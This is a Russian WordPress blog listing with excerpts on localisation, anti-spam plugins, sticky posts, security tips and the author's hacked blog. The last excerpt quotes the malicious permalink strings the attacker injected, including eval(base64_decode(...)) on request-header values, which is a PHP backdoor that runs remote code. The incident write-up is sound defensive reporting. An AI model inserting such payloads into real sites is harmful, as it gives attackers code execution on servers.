Почему при установке руссифицированного WordPress админка может быть на английском

Давно обещал знакомой поставить и настроить блог на WordPress. Проснувшись утром в субботу, я решил выделить наконец-то пару часов и настроить ей блог со всеми полезными плагинами. Благо задача установки вордпресс-блога тривиальна и я их уже ставил раз 20.

Внезапно админка Ворбпресс стала английской

Но не тут-то было. Установка проходила без проблем, но админка все время была англоязычной. Ни свежескачанные с официального сайта дистрибутивы, ни архивные, ни лекактусовские не устанавливались на русском языке. Плагины тоже были ни при чем – ставился голый стандартный Вордпресс и плагинов в нем не было. Файл конфигов wp-config.php правился только блокнотом, устанавливался Вордпресс в 3-х разных браузерах без со стандартными настройками без фильтров рекламы и прочих фишек.

Читать полностью »

Плагин Sabre: ставим защиту от ботов на странице регистрации в блоге WordPress

По какой-то непонятной мне причине при регистрации на блоге под управлением админки WordPress не нужно вводить никакой капчи. То ли авторы этой админки не считают проблемой многочисленные автоматические регистрации спам-ботов, то ли стандартная защита от спама все равно будет взломана, но факт остается фактом. Чтобы усложнить жизнь авторегистрирующимся спам-программам придется ставить специальный плагин. Например, Sabre.

Страница регистрации в WordPress с математическим антиспамом

Я долгое время не обращал внимание на количество регистраций на своих wordpress-блогах. Новые комментарии появляются – и хорошо. Ведь чтобы их оставлять регистрироваться не нужно, а парочка антиспам-фильтров доблестно сражаются с автоматическим постингом комментов – вот я не придумывал себе лишних проблем. Пока, проводя литературный конкурс на своем сайте о прохождении игр с доменом в зоне .com, не увидел масштабы проблемы.

Читать полностью »

Как прикрепить новость или статью в WordPress

Иногда бывает нужно прикрепить пост (статью или новость) в блоге WordPress, чтобы публикация не сдвигалась вниз при добавлении более новых записей. Достаточно долго в блогах на WordPress не было стандартной возможности прикреплять записи и для закрепления поста вверху страницы приходилось устанавливать специальные плагины, например, WP Sticky. Многие блогеры до сих пор используют плагин WordPress WP Sticky чтобы прикреплять посты, хотя есть более простой и удобный способ – использовать стандартную возможность самой админки WordPress.

Предлагаю вам подробную инструкцию того, как прикрепить новость или анонс статьи вверху страницы своего блога. Инструкция написана для версии WordPress 2.8.4 и выше. Если у вас более старая версия движка WordPress, настоятельно рекомендую обновиться до самой новой, дабы избежать проблем со взломом блога.

Как прикрепить пост вверху страницы блога WordPress:

1. Открываем админку WordPress, придумываем текст поста, добавляем в него иллюстрации, ключевые слова и публикуем.

2. Находим опубликованную запись, которую мы собираемся прикрепить над остальными постами блога (Администрирование->Записи->Изменить). Наводим указатель мышки на заголовок поста и нажимаем на появившуюся ссылку Свойства:

Свойства записи в WordPress

Читать полностью »

Как защитить блог WordPress от взлома

Большинство сайтов и блогов взламываются автоматически, т.е. без прямого участия взломщика. Специальные скрыпты и программы (вирусы) находят уязвимости в системах управления и скриптах сайта, подбирают простые пароли к учетным записям администратора, воруют пароли с помощью троянов и клавиатурных шпионов. Конечно, от всего не убережешься, но если соблюдать несколько простых правил, можно процентов на 90 уменьшить вероятность взлома своего блога. После взлома этого блога я очень забочусь о безопасности :).

Защита блога от взлома

Как защитить блог от взлома:

1. Придумать или сгенерировать уникальные сложные пароли для разных сайтов.
Хороший пароль не должен быть похож на осмысленное слово или словосочетание, в нем должны быть спецсимволы, цифры и буквы разных регистров. Такие пароли сложно запомнить, потому их лучше записать на бумаге или использовать для этого специальные программы, которые хранят пароли в зашифрованном виде.

2. Настроить программу хранения паролей в зашифрованном виде.
Конечно, пароли можно хранить в блокноте на рабочем столе. Очень удобно, но очень небезопасно. Рано или поздно ваш компьютер подцепит какую-то заразу и все ваши пароли могут стать достоянием общественности.

У меня был такой файлик и я знаю, как тяжело избавиться от привычки хранить пароли в одном месте в открытом виде. Но в один прекрасный день, после 2х суток исправления последствий заражения моих сайтов злым вирусом по FTP, я потратил 3 часа на установку и переписывание обновленных паролей в специальную программу, которая хранит пароли в зашифрованном виде. Заодно перестал хранить пароли к ftp в Total Commander. Да, нудно и неудобно, зато с тех пор мои пароли не воровались. Нервные клетки мне очень благодарны.

Программ для хранения зашифрованных паролей очень много, есть платные, есть бесплатные. Не буду писать, какой программой пользуюсь я — чем меньше потенциальные взломщики знают о вашей защите, тем лучше ;).

Читать полностью »

Взлом моего блога через уязвимость WordPress

Скупой платит дважды, а ленивый работает в два раза больше. Об этом я вспомнил, когда мой блог стал очередной жертвой уязвимости в движке WordPress 2.8, устраненной только в версии WordPress 2.8.4. Благодаря этой дыре можно удаленно изменить пароль администратора блога WordPress, получив тем самым полный доступ к админке блога. Как что не стоит лениться обновлять движок до последней версии – спокойнее спаться будет.

В принципе, скрипт, получивший доступ к админке моего блога, не сделал ничего страшного. Или просто не успел сделать. Ко всем ссылкам на статьи блога дописывалось что-то вроде

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
и
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

Этот код делал почти все ссылки блога мертвыми, переходы на посты не работали. Я перезалил шаблоны из последнего бэкапа, обновил движок WordPress, но ссылки не стали прежними. Файл .htaccess тоже был в порядке. Подозрение, что взломан хостинг, тоже не оправдались. И только просматривая параметры постоянных ссылок (Администрирование->Параметры->Постоянные ссылки) блога, я с удивлением заметил следующее:

Изменение шаблона ссылки в результате взлома WordPress

Читать полностью »